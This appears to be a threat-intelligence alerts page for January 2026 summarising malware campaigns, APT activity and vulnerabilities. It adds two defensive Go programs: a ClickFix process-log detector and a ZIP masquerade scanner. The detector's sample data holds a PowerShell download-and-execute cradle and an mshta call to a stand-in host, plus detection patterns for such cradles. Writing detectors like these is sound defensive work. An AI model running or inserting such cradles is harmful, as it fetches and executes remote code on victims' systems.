ALERTS JANUARY 2026




Each entry below lists: DATE, NAME, INFO, CATEGORY, SUBCATEGORY

30.1.26

UAT-8099 Targets Vulnerable IIS Servers in Southeast Asia

Researchers at Cisco Talos recently reported UAT-8099 activity spanning late 2025 to early 2026, where the actor targeted vulnerable IIS servers in Thailand and Vietnam. 

ALERTS

GROUP

30.1.26

Recent malicious activities attributed to TA584 threat group

Proofpoint researchers have highlighted the evolving tactics of the TA584 threat group (also tracked as Storm-0900). In 2025, TA584 expanded its global footprint, tailoring attacks to specific languages and regions while adopting "ClickFix" social engineering techniques. 

ALERTS

GROUP

30.1.26

PeckBirdy command-and-control (C&C) framework

PeckBirdy is an advanced command-and-control (C&C) framework utilized by various China-aligned Advanced Persistent Threat (APT) groups. Built on JScript, PeckBirdy can run across diverse platforms ranging from web browsers and Node.js to MSHTA and .NET.

ALERTS

APT

30.1.26

A new PureRAT malware delivery campaign

A Vietnamese threat actor is likely using AI to author code powering an ongoing phishing campaign delivering the PureRAT malware and other payloads. 

ALERTS

CAMPAIGN

30.1.26

AmnesiaRAT Deployment Leads to Ransomware Payload in Multi-stage Attack

Researchers at FortiGuard Labs have detailed recently observed activity associated with a multi-stage campaign attempting to deliver a ransomware payload. The campaign, primarily targeting Russian users, begins with the delivery of an archive containing a malicious LNK shortcut file.

ALERTS

RANSOM

30.1.26

Malicious browser extensions lead to user security compromise

The Google Chrome Web Store hosts many useful extensions that make browsing easier or more entertaining. Some extensions that look tempting in the store, however, hide functionality that is not apparent to users and that compromises their security.

ALERTS

VIRUS

30.1.26

ModeloRAT malware deployments among the recent activities attributed to the KongTuke threat group

Huntress security analysts identified a series of recent activities attributed to the threat actor known as KongTuke. The attackers have been employing malicious browser extensions to generate fake security alerts, claiming the browser halted unexpectedly and urging the user to initiate a "scan" for remediation. This technique, dubbed "CrashFix", manufactures urgency to trick victims into executing malicious commands.

ALERTS

VIRUS

30.1.26

AI-generated PowerShell backdoors deployed by the Konni APT group

A new phishing campaign orchestrated by the Konni APT group has been discovered in the wild, as reported by researchers from Check Point. The attackers are targeting software developers across the Asia-Pacific region, focusing specifically on engineering teams managing blockchain resources, with the ultimate goal of seizing cryptocurrency assets, wallet access, and credentials.

ALERTS

AI

30.1.26

New campaign spreading Remcos malware

FortiGuard Labs researchers have identified a new phishing operation distributing an updated iteration of the Remcos RAT (Remote Access Trojan). This malware grants attackers extensive control over compromised systems. The infection chain begins with a malicious email containing a Word document.

ALERTS

CAMPAIGN

30.1.26

Osiris Ransomware

A new ransomware family called Osiris was used in an attack targeting a major food service franchisee operator in Southeast Asia in November 2025.

ALERTS

RANSOM

30.1.26

Operation Covert Access targeting Argentina with RAT malware distribution

Seqrite Labs researchers have reported on a new sophisticated spear-phishing campaign targeting Argentina’s judicial sector dubbed Covert Access. The infection chain relies on targeted emails containing malicious ZIP archives. 

ALERTS

OPERATION

30.1.26

Backdoor PDFSIDER

Resecurity researchers have uncovered a new backdoor called PDFSIDER that abuses DLL side-loading to slip past antivirus and EDR defenses, loading a fake cryptbase.dll alongside a legitimate application. The implant operates in memory, uses AES-256-GCM encryption for its command-and-control channel, and offers encrypted remote shell access while checking for VMs and debuggers to avoid analysis. It is being delivered via spear-phishing with a benign-looking ZIP archive.

ALERTS

VIRUS

30.1.26

SolyxImmortal Stealer

Researchers recently reported on SolyxImmortal, a Python-based Windows infostealer built as a single “all-in-one” implant that collects credentials, documents, keystrokes, and screenshots. Per their analysis, the malware targets Chromium browsers (e.g., Chrome/Edge/Brave), pulling the master key from Local State and using Windows DPAPI + AES-GCM to decrypt saved logins, then staging loot in %TEMP% before zipping and exfiltrating it. For C2, it abuses Discord webhooks. 

ALERTS

VIRUS

17.1.26

Sicarii Ransomware

Sicarii is a novel Ransomware-as-a-Service (RaaS) operation first discovered last year. The deployed ransomware variant is capable of file encryption, data exfiltration, credential harvesting, and network reconnaissance. It specifically targets vulnerabilities in Fortinet devices during the initial attack stages, encrypts victim files using AES-GCM and appends the .sicarii extension afterwards. As reported by researchers from Check Point, a defining characteristic of the malware is an active geo-fencing mechanism that blocks execution on systems located in Israel.

ALERTS

RANSOM

17.1.26

LotusLite backdoor delivery campaign

The Acronis Threat Research Unit has detected a targeted malware campaign aimed at U.S. governmental entities. The campaign utilizes politically themed malspam with .ZIP attachments to deliver a custom C++ backdoor dubbed LotusLite. The backdoor is designed for espionage and it communicates with a hard-coded IP-based command-and-control (C2) server, enabling remote command execution, data collection/exfiltration, and establishing system persistence.

ALERTS

CAMPAIGN

17.1.26

Multi-stage ShadowReactor Campaign Delivers Remcos through Text-based Components

Remcos is a frequently seen Remote Access Trojan (RAT) payload. Researchers at Securonix shared details of a recently observed campaign, identified as Shadow#Reactor. In this multi-stage campaign, text-based files such as VBS, PowerShell scripts, and encoded text are responsible for delivering the final Remcos payload. This involves various downloads of attacker-hosted content and the use of a LOLBin (msbuild.exe) to make the malicious activity look legitimate.

ALERTS

CAMPAIGN

17.1.26

deVixor Android malware

deVixor is a new Android banking malware variant observed to target Iranian users in recent campaigns. As reported by researchers from Cyble, the attackers spread this malware by distributing malicious APK files via phishing websites that mimic legitimate automotive businesses.

ALERTS

VIRUS

17.1.26

VVS Discord Stealer

VVS Stealer is a sophisticated Python-based malware used to target Discord users and exfiltrate sensitive information. As reported by researchers from Palo Alto Unit 42, once deployed the infostealer searches for encrypted Discord tokens within the Discord client's LevelDB directory and harvests extensive account data, including credentials, billing information, and multifactor authentication (MFA) status.

ALERTS

VIRUS

17.1.26

IT3 Tax-Themed HTML Phishing Targets South African Enterprise Users

A phishing campaign targeting South African organizations is abusing SARS/IT3 tax certificates as a social-engineering lure. The email uses a subject styled like an internal reference string and delivers a malicious HTML attachment masquerading as a spreadsheet/tax document (e.g., Discovery TAX IT3(B)(C) _ <victim email address> xslx.htm). 

ALERTS

PHISHING

17.1.26

GalleryEye Spyware Masquerades as “Free Saudi Numbers” App

We identified an Android campaign targeting Saudi mobile users with a trojanized application masquerading as a “Free Saudi Numbers” utility, but the underlying threat is GalleryEye hosted on MediaFire. The lure is designed to attract users looking for “أرقام سعودية مجاناً” (free Saudi numbers), a highly effective theme because it aligns with common needs such as account verification, messaging registration, and “virtual number” services. 

ALERTS

VIRUS

17.1.26

CVE-2025-14847 - MongoBleed vulnerability exploited in the wild

CVE-2025-14847 is a recently disclosed high severity (CVSS score 8.7) Improper Handling of Length Parameter Inconsistency vulnerability affecting MongoDB and MongoDB Server in versions from 3.6 onward.

ALERTS

VULNERABILITY

17.1.26

Multi-Stage AsyncRAT Campaign Abuses Dropbox and Cloudflare

A recent AsyncRAT malware campaign abuses Dropbox and Cloudflare to deliver its payload. Initiated by phishing emails with Dropbox links, the multi-stage attack continues by disguising malicious downloads using double extensions.

ALERTS

CAMPAIGN

17.1.26

RustyWater Campaigns in the Middle East

CloudSEK recently reported a MuddyWater spear-phishing wave against targets in the Middle East (diplomatic, maritime, finance, telecom), where spoofed lures and malicious Word documents drop a newer Rust implant they call "RustyWater."

ALERTS

PHISHING

17.1.26

That performance report might give you Guloader

A recent report by researchers at AhnLab highlights a Guloader campaign disguised as an employee performance review. Following a successful social engineering attempt via malspam, the attached payload (a RAR file) is opened and its embedded Guloader executable is launched to begin the attack chain.

ALERTS

VIRUS

17.1.26

Astaroth banking malware leverages WhatsApp Web for distribution

Acronis Threat Research Unit has identified a new campaign of the Brazilian banking malware Astaroth dubbed "Boto Cor-de-Rosa." This latest iteration marks a significant evolution in the malware's capabilities, specifically regarding its distribution method. Astaroth now includes a Python-based worm module capable of exploiting WhatsApp Web to spread infection.

ALERTS

VIRUS

9.1.26

Recent Linux-based activities of the UAT-7290 threat group

Cisco Talos has identified a new campaign attributed to a threat actor tracked as UAT-7290. The group primarily targets critical infrastructure and telecommunications providers in South Asia, though recent activity indicates a possible expansion into Southeastern Europe.

ALERTS

GROUP

9.1.26

PHALT#BLYX malicious campaign

A new malware distribution campaign, tracked under the name PHALT#BLYX, is targeting European hospitality firms using phishing emails that impersonate Booking.com reservation cancellation requests. As reported by Securonix, the operation employs a "ClickFix" social engineering tactic: victims who click the email link are shown a fake Windows Blue Screen of Death (BSOD) and are tricked into opening the Windows Run prompt and pasting a malicious PowerShell command to "resolve" the error.

ALERTS

CAMPAIGN
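Both this campaign and the KongTuke "CrashFix" entry above rely on the victim pasting a command into the Run box, so the telemetry that catches them is process creation: an interactive parent (explorer.exe for Win+R) spawning a script host with a download-and-execute command line, often hidden behind -EncodedCommand. The block below is an added example, not Securonix's or Huntress's detection logic; the "parent=.. image=.. cmdline=.." line format and the sample lines are constructed, and the indicator list is a starting point rather than a complete rule.

```go
package main

import (
	"encoding/base64"
	"errors"
	"fmt"
	"regexp"
	"strings"
	"unicode/utf16"
)

// ProcEvent is a minimal process-creation record; the line format is constructed
// for this example, not a real Sysmon or EDR schema.
type ProcEvent struct{ Parent, Image, CmdLine string }

func ParseEvent(line string) (ProcEvent, error) {
	i := strings.Index(line, " cmdline=")
	if i < 0 {
		return ProcEvent{}, errors.New("no cmdline field")
	}
	var e ProcEvent
	for _, kv := range strings.Fields(line[:i]) {
		k, v, _ := strings.Cut(kv, "=")
		switch k {
		case "parent":
			e.Parent = strings.ToLower(v)
		case "image":
			e.Image = strings.ToLower(v)
		}
	}
	e.CmdLine = line[i+len(" cmdline="):]
	if e.Parent == "" || e.Image == "" {
		return ProcEvent{}, errors.New("missing parent or image")
	}
	return e, nil
}

// PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
// the argument is base64 of UTF-16LE text, so decode it before matching indicators.
var encRe = regexp.MustCompile(`(?i)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})`)

func DecodeEncodedCommand(cmd string) string {
	m := encRe.FindStringSubmatch(cmd)
	if m == nil {
		return ""
	}
	raw, err := base64.StdEncoding.DecodeString(m[1])
	if err != nil || len(raw)%2 != 0 {
		return ""
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u))
}

// EncodeCommand is the inverse; used only to construct the sample log line below.
func EncodeCommand(s string) string {
	u := utf16.Encode([]rune(s))
	b := make([]byte, 2*len(u))
	for i, v := range u {
		b[2*i], b[2*i+1] = byte(v), byte(v>>8)
	}
	return base64.StdEncoding.EncodeToString(b)
}

// A ClickFix victim pastes into Win+R or a console, so the parent is the interactive shell,
// not a service, scheduler or installer (those are the usual benign PowerShell parents).
var interactiveParents = map[string]bool{"explorer.exe": true, "cmd.exe": true}
var scriptHosts = map[string]bool{"powershell.exe": true, "pwsh.exe": true, "mshta.exe": true, "cmd.exe": true}
var indicators = []*regexp.Regexp{
	regexp.MustCompile(`(?i)\biex\b|invoke-expression`),
	regexp.MustCompile(`(?i)downloadstring|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b`),
	regexp.MustCompile(`(?i)https?://`),
	regexp.MustCompile(`(?i)-w(?:indowstyle)?\s+hidden`),
}

// Reasons explains why an event looks like ClickFix execution; nil means no match.
func Reasons(e ProcEvent) []string {
	if !interactiveParents[e.Parent] || !scriptHosts[e.Image] {
		return nil
	}
	text, r := e.CmdLine, []string(nil)
	if d := DecodeEncodedCommand(e.CmdLine); d != "" {
		r = append(r, "encoded command: "+d)
		text += " " + d
	}
	for _, re := range indicators {
		if m := re.FindString(text); m != "" {
			r = append(r, "indicator: "+m)
		}
	}
	return r
}

type Hit struct {
	Line    string
	Reasons []string
}

func Triage(lines []string) []Hit {
	var hits []Hit
	for _, l := range lines {
		if e, err := ParseEvent(l); err == nil {
			if r := Reasons(e); len(r) > 0 {
				hits = append(hits, Hit{l, r})
			}
		}
	}
	return hits
}

// SampleLines are constructed for this example; example.invalid is a reserved name.
func SampleLines() []string {
	payload := "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/fix.ps1')"
	return []string{
		`parent=explorer.exe image=notepad.exe cmdline=notepad.exe C:\Users\a\notes.txt`,
		`parent=svchost.exe image=powershell.exe cmdline=powershell.exe -File C:\scripts\backup.ps1`,
		"parent=explorer.exe image=powershell.exe cmdline=powershell.exe -w hidden -ExecutionPolicy Bypass -enc " + EncodeCommand(payload),
		"parent=explorer.exe image=mshta.exe cmdline=mshta.exe http://example.invalid/fix.hta",
	}
}

func main() {
	for _, h := range Triage(SampleLines()) {
		fmt.Println(h.Line, "->", strings.Join(h.Reasons, "; "))
	}
}
```

The parent-process gate is what keeps this usable: download cradles also appear in legitimate deployment scripts, but those are spawned by svchost.exe, installers or management agents, not by explorer.exe. Decoding the encoded command before matching matters because a bare "-enc" with a long base64 argument would otherwise show no indicators at all.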

9.1.26

CVE-2025-52691 - SmarterTools SmarterMail vulnerability

CVE-2025-52691 is a recently disclosed critical (CVSS score 10.0) arbitrary file upload vulnerability affecting SmarterTools SmarterMail software, which is an email, groupware, and collaboration server designed as an alternative to enterprise collaboration solutions such as Microsoft Exchange.

ALERTS

VULNERABILITY

9.1.26

Kimwolf Android botnet

The Kimwolf botnet has been reported to have infected more than 2 million Android devices, tunneling through residential proxy networks. According to researchers from XLab, the malware is a strain of the AISURU botnet family and has been active on the threat landscape since at least August 2025. It has the capability for various DDoS attacks, proxy forwarding, reverse shell and file management, among others.

ALERTS

BOTNET

4.1.26

Datebug APT campaign targeting governmental organizations in India

Researchers from Cyfirma have identified a targeted cyber espionage campaign attributed to the Datebug APT group (aka APT36, Transparent Tribe). The campaign utilizes a deceptive delivery mechanism involving weaponized Windows shortcut (LNK) files concealed within a ZIP archive and masquerading as legitimate PDFs to trick victims. The infection chain is notable for its stealthy, fileless execution.

ALERTS

APT
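The Datebug lure above (an LNK inside a ZIP, named to look like a PDF) and the double-extension downloads in the AsyncRAT entry can both be screened before the user ever sees them by looking inside the archive rather than trusting the file name. The block below is an added example, not Cyfirma's or the original page's code: it builds a constructed ZIP, then flags executable extensions, document-looking double extensions including the space-padded "Invoice.pdf          .lnk" form that hides the real extension in Explorer, and any entry whose first 20 bytes are a Shell Link header regardless of its name.

```go
package main

import (
	"archive/zip"
	"bytes"
	"fmt"
	"io"
	"path"
	"strings"
)

// Shell Link (.lnk) header: HeaderSize 0x4C followed by the LinkCLSID
// 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
var lnkMagic = []byte{0x4C, 0, 0, 0, 0x01, 0x14, 0x02, 0, 0, 0, 0, 0, 0xC0, 0, 0, 0, 0, 0, 0, 0x46}

var execExt = map[string]bool{".lnk": true, ".exe": true, ".scr": true, ".js": true, ".vbs": true,
	".hta": true, ".bat": true, ".cmd": true, ".ps1": true, ".msi": true}
var docExt = map[string]bool{".pdf": true, ".doc": true, ".docx": true, ".xls": true, ".xlsx": true,
	".jpg": true, ".png": true, ".txt": true}

type Finding struct{ Name, Reason string }

// Inspect walks a ZIP held in memory and reports masquerading tricks: executable extensions,
// document-looking double extensions (trailing spaces before the real extension are ignored,
// as Explorer would hide them), and LNK content whatever the entry is called.
func Inspect(archive []byte) ([]Finding, error) {
	zr, err := zip.NewReader(bytes.NewReader(archive), int64(len(archive)))
	if err != nil {
		return nil, err
	}
	var out []Finding
	for _, f := range zr.File {
		lower := strings.ToLower(path.Base(f.Name)) // zip entry names use forward slashes
		ext := path.Ext(lower)
		if execExt[ext] {
			inner := path.Ext(strings.TrimSpace(strings.TrimSuffix(lower, ext)))
			if docExt[inner] {
				out = append(out, Finding{f.Name, "double extension " + inner + ext})
			} else {
				out = append(out, Finding{f.Name, "executable extension " + ext})
			}
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		head := make([]byte, len(lnkMagic))
		n, _ := io.ReadFull(rc, head)
		rc.Close()
		if n == len(lnkMagic) && bytes.Equal(head, lnkMagic) {
			out = append(out, Finding{f.Name, "Shell Link header (LNK content)"})
		}
	}
	return out, nil
}

// BuildSample constructs a ZIP shaped like the lures described above; the entry contents
// are placeholders except for the LNK header on the first entry.
func BuildSample() []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	add := func(name string, data []byte) {
		w, _ := zw.Create(name)
		w.Write(data)
	}
	lnk := append(append([]byte{}, lnkMagic...), make([]byte, 56)...)
	add("Invoice_2026.pdf                                  .lnk", lnk)
	add("Quarterly_Report.docx", []byte("placeholder document body"))
	add("Photo.jpg.scr", []byte("MZ placeholder"))
	zw.Close()
	return buf.Bytes()
}

func main() {
	findings, err := Inspect(BuildSample())
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%q: %s\n", f.Name, f.Reason)
	}
}
```

The content check is the one that survives renaming: an attacker can drop the ".lnk" from the name only at the cost of Windows no longer treating the file as a shortcut, so a Shell Link header under any other extension is worth a look on its own. Nested archives (a ZIP inside the ZIP) are out of scope here and would need the same walk applied recursively.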